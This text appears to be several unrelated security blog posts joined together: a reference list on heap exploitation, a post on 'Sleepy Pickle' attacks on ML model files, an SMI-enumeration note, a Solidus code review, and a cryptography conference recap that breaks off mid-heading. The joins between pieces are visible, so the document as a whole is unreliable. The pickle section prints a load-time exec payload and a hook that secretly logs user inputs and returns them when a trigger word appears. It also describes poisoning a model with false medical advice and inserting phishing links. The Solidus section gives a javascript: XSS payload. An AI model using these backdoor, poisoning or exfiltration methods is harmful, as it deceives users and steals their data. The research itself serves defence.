2019  richfelker                Next-gen malloc for musl libc – Working draft
2021  xf1les                    musl libc mallocng heap allocator explained (Part I)
2021  h_noson                   DEF CON CTF Qualifier 2021 Writeup – mooosl
2021  Andrew Haberlandt (ath0)  DefCon 2021 moosl Challenge
2021  kylebot                   [DEFCON 2021 Quals] – mooosl
2023  redis                     Lua cjson and cmsgpack integer overflow issues (CVE-2022-24834)
2023  Dronex, ptr-yudai         Fuzzing Farm #4: Hunting and Exploiting 0-day [CVE-2022-24834]
2023  Conviso Research Team     Improvement of CVE-2022-24834 public exploit

Tools

  • muslheap: A gdb
    plugin designed for analyzing the mallocng heap structures.

Exploiting ML models with pickle file attacks: Part 1

By Boyan Milanov

We’ve developed a new hybrid machine learning (ML) model exploitation technique called Sleepy Pickle that takes advantage of the pervasive and notoriously insecure Pickle file format used to package and distribute ML models. Sleepy Pickle goes beyond previous exploit techniques that target an organization’s systems when they deploy ML models to instead surreptitiously compromise the ML model itself, allowing the attacker to target the organization’s end-users that use the model. In this blog post, we’ll explain the technique and illustrate three attacks that compromise end-user security, safety, and privacy.

Why are pickle files dangerous?

Pickle is a built-in Python serialization format that saves and loads Python objects from data files. A pickle file consists of executable bytecode (a sequence of opcodes) interpreted by a virtual machine called the pickle VM. The pickle VM is part of the native pickle Python module and performs operations in the Python interpreter like reconstructing Python objects and creating arbitrary class instances. Check out our previous blog post for a deeper explanation of how the pickle VM works.

Pickle files pose serious security risks because an attacker can easily insert malicious bytecode into a benign pickle file. First, the attacker creates a malicious pickle opcode sequence that will execute an arbitrary Python payload during deserialization. Next, the attacker inserts the payload into a pickle file containing a serialized ML model. The payload is injected as a string within the malicious opcode sequence. Tools such as Fickling can create malicious pickle files with a single command and also have fine-grained APIs for advanced attack techniques on specific targets. Finally, the attacker tricks the target into loading the malicious pickle file, usually via techniques such as:

  • Man-In-The-Middle (MITM)
  • Supply chain compromise
  • Phishing or insider attacks
  • Post-exploitation of system weaknesses
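To make the mechanism concrete, here is a minimal standard-library
sketch of the first two steps (this shows the generic pickle behavior
that tools like Fickling automate; the payload string is a harmless
stand-in):

import pickle

class Payload:
    def __reduce__(self):
        # during deserialization, the pickle VM calls exec() with this
        # string before any object is handed back to the caller
        return exec, ("print('attacker code ran at load time')",)

blob = pickle.dumps(Payload())   # stand-in for a poisoned model file
pickle.loads(blob)               # victim side: loading alone runs the payload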

In practice, landing a pickle-based exploit is challenging because once a user loads a malicious file, the attacker payload executes in an unknown environment. While it might be fairly easy to cause crashes, controls like sandboxing, isolation, privilege limitation, firewalls, and egress traffic control can prevent the payload from severely damaging the user’s system or stealing/tampering with the user’s data. However, it is possible to make pickle exploits more reliable and equally powerful on ML systems by compromising the ML model itself.

Sleepy Pickle surreptitiously compromises ML models

Sleepy Pickle (figure 1 below) is a stealthy and novel attack technique that targets the ML model itself rather than the underlying system. Using Fickling, we maliciously inject a custom function (payload) into a pickle file containing a serialized ML model. Next, we deliver the malicious pickle file to our victim’s system via a MITM attack, supply chain compromise, social engineering, etc. When the file is deserialized on the victim’s system, the payload is executed and modifies the contained model in-place to insert backdoors, control outputs, or tamper with processed data before returning it to the user. There are two aspects of an ML model an attacker can compromise with Sleepy Pickle:

  1. Model parameters: Patch a subset of the model weights to change the intrinsic behavior of the model. This can be used to insert backdoors or control model outputs.
  2. Model code: Hook the methods of the model object and replace them with custom versions, taking advantage of the flexibility of the Python runtime. This allows tampering with critical input and output data processed by the model.

Figure 1: Corrupting an ML model via a pickle file injection
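As a rough sketch of the second aspect, this is what hooking a model’s
method can look like once the payload runs; DummyModel and its generate
method are illustrative stand-ins, not a real library API:

class DummyModel:
    # stand-in for a deserialized ML model
    def generate(self, prompt: str) -> str:
        return f"summary of {prompt!r}"

def payload(model):
    # executed during unpickling: wrap the inference method so every
    # output can be tampered with before the application sees it
    original = model.generate

    def hooked(prompt: str) -> str:
        return original(prompt) + " [attacker-inserted content]"

    model.generate = hooked
    return model

model = payload(DummyModel())
print(model.generate("a web page"))   # tampered output, no trace on disk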

Sleepy Pickle is a powerful attack vector that malicious actors can use to maintain a foothold on ML systems and evade detection by security teams, which we’ll cover in Part 2. Sleepy Pickle attacks have several properties that allow for advanced exploitation without presenting conventional indicators of compromise:

  • The model is compromised when the file is loaded in the Python process, and no trace of the exploit is left on the disk.
  • The attack relies solely on one malicious pickle file and doesn’t require local or remote access to other parts of the system.
  • Because the model is modified dynamically at deserialization time, the changes to the model cannot be detected by a static comparison.
  • The attack is highly customizable. The payload can use Python libraries to scan the underlying system, check the timezone or the date, etc., and activate itself only under specific circumstances. This makes the attack more difficult to detect and allows attackers to target only specific systems or organizations.

Sleepy Pickle presents two key advantages compared to more naive supply chain compromise attempts such as uploading a subtly malicious model on HuggingFace ahead of time:

  1. Uploading a directly malicious model on Hugging Face requires attackers to make the code available for users to download and run it, which would expose the malicious behavior. On the contrary, Sleepy Pickle can tamper with the code dynamically and stealthily, effectively hiding the malicious parts. A rough corollary in software would be tampering with a CMake file to insert malware into a program at compile time versus inserting the malware directly into the source.
  2. Uploading a malicious model on HuggingFace relies on a single attack vector where attackers must trick their target into downloading their specific model. With Sleepy Pickle, attackers can create pickle files that aren’t ML models but can still corrupt local models if loaded together. The attack surface is thus much broader, because control over any pickle file in the supply chain of the target organization is enough to attack their models.

Here are three ways Sleepy Pickle can be used to mount novel attacks on ML systems that jeopardize user safety, privacy, and security.

Harmful outputs and spreading disinformation

Generative AI models (e.g., LLMs) are becoming pervasive in everyday use as “personal assistant” apps (e.g., Google Assistant, Perplexity AI, Siri Shortcuts, Microsoft Cortana, Amazon Alexa). If an attacker compromises the underlying models used by these apps, they can be made to generate harmful outputs or spread misinformation, with severe consequences for user safety.

We developed a PoC attack that compromises the GPT-2-XL model to spread harmful medical advice to users (figure 2). We first used a modified version of the Rank One Model Editing (ROME) method to generate a patch to the model weights that makes the model internalize that “Drinking bleach cures the flu” while keeping its other knowledge intact. Then, we created a pickle file containing the benign GPT model and used Fickling to append a payload that applies our malicious patch to the model when loaded, dynamically poisoning the model with harmful information.

Figure 2: Compromising a model to make it generate harmful outputs

Our attack modifies a very small subset of the model weights. This is essential for stealth: serialized model files can be very big, and keeping the patch small brings the overhead on the pickle file to less than 0.1%. Figure 3 below is the payload we injected to carry out this attack. Note how the payload checks the local timezone on lines 6-7 to decide whether to poison the model, illustrating fine-grained control over payload activation.

Figure 3: Sleepy Pickle payload that compromises GPT-2-XL model

Stealing user data

LLM-based products such as Otter AI, Avoma, Fireflies, and many others are increasingly used by businesses to summarize documents and meeting recordings. Sensitive and/or private user data processed by the underlying models within these applications is at risk if the models have been compromised.

We developed a PoC attack that compromises a model to steal private user data the model processes during normal operation. We injected a payload into the model’s pickle file that hooks the inference function to record private user data. The hook also checks for a secret trigger word in model input. When found, the compromised model returns all the stolen user data in its output.

Figure 4: Compromising a model to steal private user data
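A hedged sketch of that hook, reusing the stand-in names from the
previous example (the real payload hooks whatever inference entry point
the application uses, and the trigger word is arbitrary):

stolen = []

def steal_hook(model):
    original = model.generate

    def hooked(text: str) -> str:
        if "SECRET_TRIGGER_XYZ" in text:   # attacker's retrieval request
            return "\n".join(stolen)       # exfiltrate via the normal output
        stolen.append(text)                # silently record user input
        return original(text)

    model.generate = hooked
    return model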

Once the compromised model is deployed, the attacker waits for user data to accumulate and then submits a document containing the trigger word to the app to collect it. This cannot be prevented by traditional security measures such as DLP solutions or firewalls, because everything happens within the model code and through the application’s public interface. This attack demonstrates how ML systems present new attack vectors and how new threats emerge.

Phishing users

Other types of summarizer applications are LLM-based browser apps (Google’s ReaderGPT, Smmry, Smodin, TldrThis, etc.) that enhance the user experience by summarizing the web pages they visit. Since users tend to trust information generated by these applications, compromising the underlying model to return harmful summaries is a real threat and can be used by attackers to serve malicious content to many users, deeply undermining their security.

We demonstrate this attack in figure 5 using a malicious pickle file that hooks the model’s inference function and adds malicious links to the summary it generates. When altered summaries are returned to the user, they are likely to click on the malicious links and potentially fall victim to phishing, scams, or malware.

Figure 5: Compromise model to attack users indirectly

While basic attacks only have to insert a generic message with a malicious link in the summary, more sophisticated attacks can make malicious link insertion seamless by customizing the link based on the input URL and content. If the app returns content in an advanced format that contains JavaScript, the payload could also inject malicious scripts in the response sent to the user using the same attacks as with stored cross-site scripting (XSS) exploits.

Avoid getting into a pickle with unsafe file formats!

The best way to protect against Sleepy Pickle and other supply chain attacks is to only use models from trusted organizations and rely on safer file formats like SafeTensors. Pickle scanning and restricted unpicklers are ineffective defenses that dedicated attackers can circumvent in practice.

Sleepy Pickle demonstrates that advanced model-level attacks can exploit lower-level supply chain weaknesses via the connections between underlying software components and the final application. However, other attack vectors exist beyond pickle, and the overlap between model-level security and supply chain security is very broad. This means it’s not enough to consider security risks to AI/ML models and their underlying software in isolation; they must be assessed holistically. If you are responsible for securing AI/ML systems, remember that their attack surface is probably way larger than you think.

Stay tuned for our next post introducing Sticky Pickle, a sophisticated technique that improves on Sleepy Pickle by achieving persistence in a compromised model and evading detection!

Acknowledgments

Thank you to Suha S. Hussain for contributing to the initial Sleepy Pickle PoC and our intern Lucas Gen for porting it to LLMs.

Enumerating System Management Interrupts

System Management Interrupts (SMI) provide a mechanism for entering System Management Mode (SMM) which primarily implements platform-specific functions related to power management. SMM is a privileged execution mode with access to the complete physical memory of the system, and to which the operating system has no visibility. This makes the code running in SMM an ideal target for malware insertion and potential supply chain attacks. Accordingly, it would be interesting to develop a mechanism to audit the SMIs present on a running system with the objective of cross-referencing this information with data provided by the BIOS supplier. This could help ensure that no new firmware entry-points have been added in the system, particularly in situations where there is either no signature verification for the BIOS, or where such verification can be bypassed by the attacker.

Section 32.2, “System Management Interrupt (SMI)”, of Intel’s System Programming Guide [1] states the following regarding the mechanisms to enter SMM and its assigned system priority:

“The only way to enter SMM is by signaling an SMI through the SMI# pin on the processor or through an SMI message received through the APIC bus. The SMI is a nonmaskable external interrupt that operates independently from the processor’s interrupt- and exception-handling mechanism and the local APIC. The SMI takes precedence over an NMI and a maskable interrupt. SMM is non-reentrant; that is, the SMI is disabled while the processor is in SMM.”

Many mainboard chipsets (PCH), such as the Intel 500 series chipset family [2], expose the I/O addresses B2h and B3h, enabling the signaling of the SMI# pin on the processor. Writing a byte value to address B2h signals the SMI code that corresponds to the written value. Address B3h is used for passing information between the processor and SMM and needs to be written before the SMI is signaled.

Chipsec [3] is the industry standard tool for auditing the security of x86 platform firmware. It is open source and maintained by Intel. Chipsec includes a module called smm_ptr, which searches for SMI handlers that result in the modification of an allocated memory buffer. It operates by filling the allocated memory with an initial value that is checked after every SMI call. It then iterates through all specified SMI codes, looking for changes in the buffer, whose address is passed to the SMI via the processor’s general-purpose registers (GPRs).

Although highly useful as a reference approach to triggering SMIs from software, Chipsec’s smm_ptr module does not fulfill the objective of enumerating them: only when an SMI causes an observable change in the passed memory buffer does the module consider it vulnerable and flag its existence.

Since our goal is to enumerate SMIs, I considered measuring the time it takes for an SMI to execute as a simple measure of the complexity of its handler. The hypothesis is that an SMI code ignored by the BIOS would result in a shorter execution time than one that is properly handled. With this objective in mind, I added the ‘scan’ mode to the smm_ptr module [4].

The scan mode introduces a new ioctl command to Chipsec’s kernel module that triggers the SMI and returns the elapsed time to the caller. This mode maintains a running average of the time it takes for an SMI to execute and flags whenever one exceeds a defined margin.
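In pseudocode, the scan logic looks roughly like this; trigger_smi()
stands in for the new ioctl, and the margin and averaging weights are
illustrative rather than the module’s exact values:

def scan(smi_codes, trigger_smi, margin=4/3):
    # flag SMIs whose handlers run noticeably longer than the running average
    average = None
    flagged = []
    for code in smi_codes:
        elapsed = trigger_smi(code)
        if average is not None and elapsed > average * margin:
            # confirmation read: re-trigger to filter the periodic outliers
            elapsed = trigger_smi(code)
            if elapsed > average * margin:
                flagged.append((code, elapsed))
                continue
        # fold well-behaved samples into the running average
        average = elapsed if average is None else 0.9 * average + 0.1 * elapsed
    return flagged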

In the initial tests performed, an unexpected behaviour was observed: with a periodicity of one second, a roughly ten times larger runtime appeared for the same SMI code. To confirm these outliers were only present when the SMI was signaled, I implemented an equivalent test, replacing the SMI call with an equally long time-consuming loop. The results of both tests are presented below.

[figure: CPU counts per SMI call]
[figure: CPU counts per test loop execution]

The details of each long-running SMI are presented next, where ‘max’ and ‘min’ are the maximum and minimum measured elapsed times in CPU counts, ‘total’ is the number of SMIs signaled, ‘address’ shows the register used for passing the address of the allocated buffer, and ‘data’ is the value written to I/O address B3h.

SMI: 0, max: 5023124, min: 680534, count: 7, total: 12288,
  long-running SMIs: [
  {'time offset': 278.017 ms, 'counts': 3559564, 'rcx': 11, 'address': rbx, 'data': 0x09},
  {'time offset': 1278.003 ms, 'counts': 3664844, 'rcx': 14, 'address': rbx, 'data': 0x2C},
  {'time offset': 2277.865 ms, 'counts': 4244506, 'rcx': 1, 'address': rbx, 'data': 0x50},
  {'time offset': 3277.685 ms, 'counts': 4950032, 'rcx': 4, 'address': rsi, 'data': 0x73},
  {'time offset': 4277.681 ms, 'counts': 5023124, 'rcx': 8, 'address': rbx, 'data': 0x96},
  {'time offset': 5277.898 ms, 'counts': 4347570, 'rcx': 11, 'address': rbx, 'data': 0xB9},
  {'time offset': 6277.909 ms, 'counts': 4374736, 'rcx': 14, 'address': rsi, 'data': 0xDC}]

I don’t know the reason for these periodic lengthy SMIs. I can only speculate these might be NMI interrupts being blocked by SMM and serviced with priority right after exiting SMM and before the time is measured. In any case, I opted for performing a confirmation read once a long-running SMI is found, which effectively filters out these long measurements, resulting in the output shown below. It has an average elapsed time of 770239.23 counts and standard deviation of 7377.06 counts (0.219749 ms and 2.104e-06 seconds respectively on a 3.5 GHz CPU).

[figure: CPU counts per SMI, with outliers filtered out]

To discard any effects of the values passed to the SMI, I ran the test by repeatedly signaling the same SMI code and parameters. Below is the result using the confirmation read strategy, showing an average value of 769718.88 counts (0.219600 ms) and standard deviation of 6524.88 counts (1.861e-06 seconds).

[figure: CPU counts per SMI, with outliers filtered out and using the same SMI parameters]

The proposed scan mode is effective in identifying long-running SMIs present in the system. However, it is unable to find others that fall within the bounds of the defined threshold. For example, using an arbitrary threshold of 1/3 above the average, the implementation failed to notice some of the SMIs flagged by smm_ptr’s fuzz and fuzzmore modes. The main reasons are the large deviation observed and the challenge of dealing with a system for which no confirmed SMI codes are provided, which makes it difficult to calibrate the algorithm and establish a suitable threshold value.

The implementation has been merged into the upstream version of Chipsec and will be included in the next release [5].

[1] Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3 (3A, 3B, 3C, 3D): System Programming Guide
[2] Intel® 500 Series Chipset Family On-Package Platform Controller Hub Datasheet, Volume 1 of 2. Rev. 007, September 2021.
[3] https://chipsec.github.io/
[4] https://github.com/nccgroup/chipsec/commit/eaad11ad587d951d3720c43cbce6d068731b7cdb
[5] https://github.com/chipsec/chipsec/pull/2141

Solidus — Code Review

As Research Engineers at Tenable, we have several periods during the year to work on a subject of our choice, as long as it is of interest to the team. For my part, I chose to carry out a code review of a Ruby on Rails project.

The main objective is to focus on reviewing code, understanding it and the various interactions between components.

I’ve chosen Solidus, which is an open-source eCommerce framework “for industry trailblazers”. Originally, the project was a fork of Spree.

Developed with the Ruby on Rails framework, Solidus consists of several gems. When you require the solidus gem in your Gemfile, Bundler will install all of the following gems:

  • solidus_api (RESTful API)
  • solidus_backend (Admin area)
  • solidus_core (Essential models, mailers, and classes)
  • solidus_sample (Sample data)

All of the gems are designed to work together to provide a fully functional ecommerce platform.


Project selection

Solidus wasn’t my first choice; I originally wanted to select Zammad, which is a web-based open-source helpdesk/customer support system, also developed with Ruby on Rails.

The project is quite popular and, after a quick look, has a good attack surface. This type of project is also interesting because, for many businesses, the support/ticketing component is quite critical: identifying a vulnerability in a project such as Zammad almost guarantees having an interesting vulnerability!

For various reasons, whether on my professional or personal laptop, I need to run the project in Docker, something that’s pretty common today for a web project, but:

Zammad is a project that requires many components, such as Elasticsearch, Memcached, PostgreSQL, and Redis, and although the project provides a ready-to-use docker-compose, as soon as I wanted to use it in development mode, the project wouldn’t initialize properly.

Rather than waste too much time, I decided to put it aside for another time (for sure) and chose another project that seemed simpler to get started on.

After a tour of GitHub, I came across Solidus, which not only offers instructions for setting up a development environment in just a few lines, but also has a few public vulnerabilities.

For us, this is generally a good sign in terms of communication in case of a discovery: it shows that the publisher is open to exchange, which is unfortunately not always the case.

The reality is that I also had a few problems with the supplied Solidus Dockerfile, but by browsing the issues and making some modifications of my own, I was able to quickly launch the project.

[figure: project started with the bin/dev command]

Ruby on Rails Architecture & Attack Surface

Like many web frameworks, Ruby on Rails uses an MVC architecture. Although this is not the theme of this blog post, a little reminder doesn’t hurt to make sure you understand the rest:

  • Model contains the data and the logic around the data (validation, registration, etc.)
  • View displays the result to the user
  • The Controller handles user actions and modifies model and view data. It acts as a link between the model and the view.

Another important point about Ruby on Rails is that this framework favors “convention over configuration”, which means that many choices are made for you and that all projects will have similarities; this makes it easier to understand a project from an attacker’s point of view if you know how the framework works.

In a Ruby on Rails project, application routing is managed directly by the config/routes.rb file. All possible actions are defined in this file!

As explained in the overview chapter, Solidus is composed of a set of gems (Core, Backend & API) designed to work together to provide a fully functional ecommerce platform.

These three components are independent of each other, so when we audit the solidus/solidus GitHub project, we’re actually auditing multiple projects with multiple distinct attack surfaces that are more or less interconnected.

Solidus has three main route files:

  • Admin: namespace SolidusAdmin::Engine
  • Backend: namespace Spree::Core::Engine
  • API: namespace Spree::Core::Engine

Two of the three files are in the same namespace, while Admin is more detached.

A namespace can be seen as a “group” that contains Classes, Constants or other Modules. This allows you to structure your project. Here, it’s important to understand that API and Backend are directly connected, but cannot interact directly with Admin.

If we take a closer look at the file, we can see that routes are defined in several ways. Without going into all the details and subtleties, you can either define your route directly, such as

get '/orders/mine', to: 'orders#mine', as: 'my_orders'

This means the GET request on /orders/mine will be sent to the “mine” method of the Orders controller (we don’t care about the as: 'my_orders' part here).

module Spree
  module Api
    class OrdersController < Spree::Api::BaseController
      # [...]
      def mine
        if current_api_user
          @orders = current_api_user.orders.by_store(current_store).reverse_chronological.ransack(params[:q]).result
          @orders = paginate(@orders)
        else
          render "spree/api/errors/unauthorized", status: :unauthorized
        end
      end
      # [...]

Or via the CRUD system, using something like:

resources :customer_returns, except: :destroy

For the explanations, I’ll go straight to what the Ruby on Rails documentation says:

“In Rails, a resourceful route provides a mapping between HTTP verbs and URLs to controller actions. By convention, each action also maps to a specific CRUD operation in a database.”

So here, the :customer_returns resource will link to the CustomerReturns controller for the following URLs:

  • GET /customer_returns
  • GET /customer_returns/new
  • POST /customer_returns
  • GET /customer_returns/:id
  • GET /customer_returns/:id/edit
  • PATCH/PUT /customer_returns/:id
  • DELETE /customer_returns/:id (ignored because of except: :destroy)

So, with this, it’s easy to see that Solidus has a sizable attack surface.

Static Code Analysis

This project also gives me the opportunity to test various static code analysis tools. I don’t expect much from these tools, but as I don’t use them regularly, this allows me to see what’s new and what’s been developing.

The advantage of having an open-source project on GitHub is that many static analysis tools can be run through a GitHub Action, at least… in theory.

Without going over all the tools tested: CodeQL is the only one that I was able to run “out of the box” via a GitHub Action; the results are then directly visible in the Security tab.

[figure: extract of vulnerabilities identified by CodeQL]

Processing the results from all the tools takes a lot of time; many findings are redundant, and I also observed that some paid tools are in fact just overlays of open-source tools such as Semgrep (the results being exactly the same, down to the same phrasing).

Special mention to Brakeman, a tool dedicated to the analysis of Ruby on Rails code; it quickly and simply surfaces interesting paths to explore in a readable manner.

[figure: extract of vulnerabilities identified by Brakeman]

Without going over all the discoveries that I have put aside (paths to explore), some vulnerabilities are quick to rule out. Take for example the “Polynomial regular expression used on uncontrolled data” finding from CodeQL:

In addition to seeming unexploitable to me, this case is not very interesting because it affects the admin area and therefore requires elevated privileges to be exploited.

Now take this “SQL Injection” example from Brakeman:

As the analysis lacks context, it does not know that price_table_name does not in fact correspond to user input, but to a call to a method that returns the name of a table (which is therefore not controllable by a user).

However, these tools remain interesting because they can give a quick overview of areas to dig.

Identifying a Solidus Website

Before getting into the nitty-gritty of the subject, it may be interesting to identify whether the visited site uses Solidus or not, and for that there are several methods.

On the main shop page, it is possible to search for the following patterns:

<p>Powered by <a href="http://solidus.io/">Solidus</a></p>
/assets/spree/frontend/solidus_starter_frontend

Or check whether the following JS functions are available:

Solidus()
SolidusPaypalBraintree

Or finally, visit the administration panel accessible at /admin/login and look for one of the following patterns:

<img src="/assets/logo/solidus
<script src="/assets/solidus_admin/
solidus_auth_devise replaces this partial

Unfortunately, no technique seems more reliable than the others, and none of them make it possible to determine the version of Solidus.
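Still, these checks are easy to script; a quick sketch using the main-page patterns above (standard library only):

import urllib.request

PATTERNS = [
    '<p>Powered by <a href="http://solidus.io/">Solidus</a></p>',
    "/assets/spree/frontend/solidus_starter_frontend",
]

def looks_like_solidus(url: str) -> bool:
    # fetch the main shop page and look for any telltale pattern
    html = urllib.request.urlopen(url).read().decode("utf-8", "replace")
    return any(p in html for p in PATTERNS)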

Using the website as a normal user

In order to get closer to the product, I like to spend time using it as a typical user, and given the number of routes available, I thought I’d spend a little time there. I was soon disappointed to see that for a classic user, there isn’t much to do outside the purchasing process.

Once the order is placed, user actions are rather limited:

  • See your orders
  • See a specific order (But no PDF or tracking)
  • Update your information (Only email and password)

We will just add that when an order is placed, an email is sent to the user and a new email is sent when the product is shipped.

The administration is also quite limited; apart from the classic actions of an ecommerce site (management of orders, products, stock, etc.), there is only a small amount of configuration that can be done directly from the panel.

For example, it is not possible to configure SMTP; this configuration must be done directly in the Rails project config.

Authentication & Session management

Authentication is a crucial aspect of web application security. It ensures that only authorized individuals have access to the application’s features and sensitive data.

Devise is a popular, highly configurable and robust Ruby on Rails gem for user authentication. This gem provides a complete solution for managing authentication, including account creation, login, logout and password reset.

One reason why Devise is considered a robust solution is its ability to support advanced security features such as email validation, two-factor authentication and session management. Additionally, Devise is regularly updated to fix security vulnerabilities and improve its features.

When I set up my Solidus project, version 4.9.3 of Devise was used, i.e., the latest version available, so I didn’t spend too much time on this part, which immediately seemed to me to be a dead end.

Authorization & Permissions management

Authorization & permissions management is another critical aspect of web application security. It ensures that users only have access to the features and data that they are permitted to access based on their role or permissions.

By default, Solidus only has two roles defined:

  • SuperUser: the administrator role, which allows access to all the functionalities
  • DefaultCustomer: the default role assigned during registration, simply allowing you to make purchases on the site

To manage this component, Solidus uses a gem called CanCanCan. Like Devise, CanCanCan is considered a robust solution due to its ability to support complex authorization scenarios, such as hierarchical roles and dynamic permissions. Additionally, CanCanCan is highly configurable.

Furthermore, CanCanCan is highly tested and reliable, making it a safe choice for critical applications. It also has an active community of developers who can provide assistance and advice if needed.

Some Rabbit Holes

1/ Not very interesting Cross-Site Scripting

Finding vulnerabilities is fun, even more so if they are critical, but many articles do not explain that the search takes a lot of time and that many attempts lead to nothing.

Digging into these vulnerabilities, even knowing that they will lead to nothing, is not always meaningless.

Let’s take this Brakeman detection as an example:

Despite the presence of :target => “_blank”, which makes an XSS difficult to exploit (outside of unusual interactions such as a mouse-wheel click), I found it interesting to dig into this part of the code and understand how to achieve this injection, simply because it concerns the administration area.

Here’s how this vulnerability could be exploited:

1/ An administrator must modify the shipping methods to add `javascript:alert(document.domain)` as the tracking URL

2/ A user must place an order

3/ An administrator must validate the order and add a tracking number

4/ The tracking URL then corresponds to the payload, which can be triggered via a middle-click

Since, by default, the only role with this access is administrator, the only possibility is that an administrator traps another administrator… in other words, far from interesting.

Note: according to the Solidus documentation, in a non-default configuration it would be possible for a less-privileged user to exploit this vulnerability.

Although the impact and exploitability are very low, we pointed out the weakness to Solidus. Despite several attempts to contact them, we did not receive a response. The vulnerability was published as CVE-2024-4859.

2/ Solidus, State Machine & Race Conditions

On an e-commerce site, I find that testing for race conditions is worthwhile because certain features lend themselves to it, such as discount coupons.

But before talking about race conditions, we must understand the concept of a state machine.

A state machine is a behavioral model used in software development to represent the different states that an object or system can be in, as well as the transitions between those states. In the context of a web application, a state machine can be used to model the different states that a user or resource can be in, and the actions that can be performed to transition between those states.

For example, in Solidus, users can place orders. An order can be in one of several states, such as “pending”, “processing”, or “shipped”. The state machine defines these states and the transitions between them, such as “place order” (which transitions from “pending” to “processing”), “cancel order” (which transitions from “processing” back to “pending”), and “ship order” (which transitions from “processing” to “shipped”).

Using a state machine in a web application provides several benefits. First, it helps to ensure that the application is consistent and predictable, since the behavior of the system is clearly defined and enforced. Second, it makes it easier to reason about the application and debug issues, since the state of the system can be easily inspected and understood. Third, it can help to simplify the codebase, since complex logic can be encapsulated within the state machine.
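
As a minimal sketch of the idea, using the order states above (illustrative Python, not Solidus’s actual Ruby state machine):

```python
# Minimal order state machine: transitions are only allowed if they are
# explicitly declared, which is what makes invalid flows impossible.
TRANSITIONS = {
    ("pending", "place_order"): "processing",
    ("processing", "cancel_order"): "pending",
    ("processing", "ship_order"): "shipped",
}

class Order:
    def __init__(self):
        self.state = "pending"

    def fire(self, event: str):
        key = (self.state, event)
        if key not in TRANSITIONS:
            raise ValueError(f"illegal transition: {event!r} from {self.state!r}")
        self.state = TRANSITIONS[key]

order = Order()
order.fire("place_order")      # pending -> processing
order.fire("ship_order")       # processing -> shipped
# order.fire("cancel_order")   # would raise: shipped orders can't be cancelled
```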

I mention this because the Solidus documentation has a chapter dedicated to it, and I find that rare enough to be worth highlighting!

Now we can try to see if any race conditions are hidden in the use of a promotion code.
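
Before tracing the code, it’s worth noting what such a test looks like in practice: fire the same coupon-apply request many times concurrently and check whether the discount ends up applied more than once. A minimal probe sketch (the endpoint and session cookie below are hypothetical placeholders):

```python
# Minimal race-condition probe: apply the same coupon concurrently and
# see whether the "already applied" guard can be bypassed.
import threading
import requests

URL = "https://shop.example.com/orders/R123456789/coupon_codes"  # placeholder
HEADERS = {"Cookie": "guest_token=PLACEHOLDER"}                  # placeholder session

def apply_coupon():
    r = requests.post(URL, json={"coupon_code": "PROMO10"}, headers=HEADERS)
    print(r.status_code, r.text[:80])

threads = [threading.Thread(target=apply_coupon) for _ in range(10)]
for t in threads:
    t.start()
for t in threads:
    t.join()
```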

Since this section of the code still lives in Spree (the ancestor of Solidus), I did not immediately find it, but in a whitebox audit it is sometimes easier to trace the code back from an error displayed by the site.

In this case, applying the same promo code twice makes the site return the error “The coupon code has already been applied to this order”.

You can then search for this error message across the project code and trace its use backwards to the method that checks coupon usage.

It is difficult to go into detail and explain all the checks, but to summarize: a coupon is associated with a specific order, and as soon as we try to apply a new coupon, the code checks whether it is already associated with the order.

In short, this code did not seem vulnerable to any race conditions.

Presenting all the tests carried out would be tedious, but the takeaway is that the main building blocks of Solidus are rather robust and that, on a default installation, I unfortunately could not find much.

So perhaps it is more interesting to focus on custom development, in particular extensions. For Solidus, extensions fall into three types:

  • Official integrations: listed on the main website; these are mainly payment-related extensions
  • Community extensions: listed in a dedicated GitHub repository; a wide variety of extensions that are more or less maintained
  • Other extensions: found elsewhere, with no guarantee that they work or are supported

Almost all official extensions require integration with a third party and will therefore make requests to that third party, which is what I wanted to avoid here.

Instead, I turned to the community extensions and tested a few whose functionality I would have liked to have natively on the site, such as PDF invoice export.

For this, I found the Solidus Print Invoice plugin, which has not been maintained for two years. You might think that this is a good sign from an attacker’s point of view, except that in reality the plugin is not designed to work with Solidus 4, so the first step was to make it compatible so that it could be installed…

As indicated in the documentation, this plugin only adds PDF generation on the admin side.

To cut a long story short, this plugin didn’t give me anything new, and I spent more time installing it than I did understanding that I wouldn’t get any vulnerabilities from it.

I haven’t had a look at it, but it’s interesting to note that other plugins, such as Solidus Friendly Promotions, replace Solidus core features according to their documentation, and are therefore inherently more likely to introduce vulnerabilities.

Conclusion

Presenting all the tests that can be and have been carried out would also be far too time-consuming. Code analysis really is slow work, so claiming that I have been exhaustive and analyzed the whole application would be false. But after spending a few days on Solidus, I think it’s a very interesting project from a security point of view.

Of course, I would have liked to detail a few more vulnerabilities, but this blog post goes to show that the search isn’t always fruitful.


Solidus — Code Review was originally published in Tenable TechBlog on Medium.

Real World Cryptography Conference 2024

This year’s Real World Cryptography Conference recently took place in Toronto, Canada. As usual, this conference organized by the IACR showcased recent academic results and industry perspectives on current cryptography topics over three days of presentations. A number of co-located events also took place before and after the conference, including the FHE.org Conference, the Real World Post-Quantum Cryptography (RWPQC) Workshop and the High Assurance Crypto Software (HACS) Workshop.

A number of NCC Group’s Cryptography Services team members attended the conference and several of the workshops this year. Some of our favorite talks and takeaways are summarized in this post.

Post-Quantum Cryptography

At this year’s Real World Cryptography conference, post-quantum cryptography was strongly represented. With two PQC sessions during the main conference itself, as well as the co-located RWPQC event which took place on the Sunday before the main conference, it was exciting to see so much engagement on the PQC front during our trip to Toronto!

Following the blueprint from last year’s event, the RWPQC workshop opened with an update on the NIST PQC competition, reiterating its current status and NIST’s goal of producing the final standards for the FIPS 203 and 204 drafts within the next few months, followed by an initial draft of the Falcon specification under the name FN-DSA. This was followed by updates from other standardization bodies, including ETSI, BSI, NCSC, and the IETF, which are all working towards providing PQC guidance in their respective areas of influence, with the final FIPS drafts expected soon. The MITRE and Linux Foundation PQC migration consortia also gave updates during the workshop. As part of these talks, many standards bodies discussed their approach to the migration and whether or not they plan to mandate the use of hybrid algorithms, with approaches varying from required hybridization to weaker mandates. Additionally, a number of the talks noted that while the use of hybrid algorithms may be helpful in the short term, the community should start considering eventual plans to migrate to a single set of algorithms post-hybridization, citing concerns about increased complexity and the combinatorial expansion of algorithm combinations as new algorithms are introduced in the future.

As a counterpart to the presentations by standardization bodies, the RWPQC program included real-world updates about the progress of the PQC migration at various companies, including Signal, Amazon, Google, Meta, and evolutionQ. All talks provided valuable insights into the challenges, both those already overcome and those yet to come, of migrating to PQC in their respective settings. Finally, a few more academic talks on lattice cryptanalysis and implementation footguns rounded off the program. We’ll do a slightly deeper dive into some of our favorite talks!

Lattice Cryptanalysis Talks

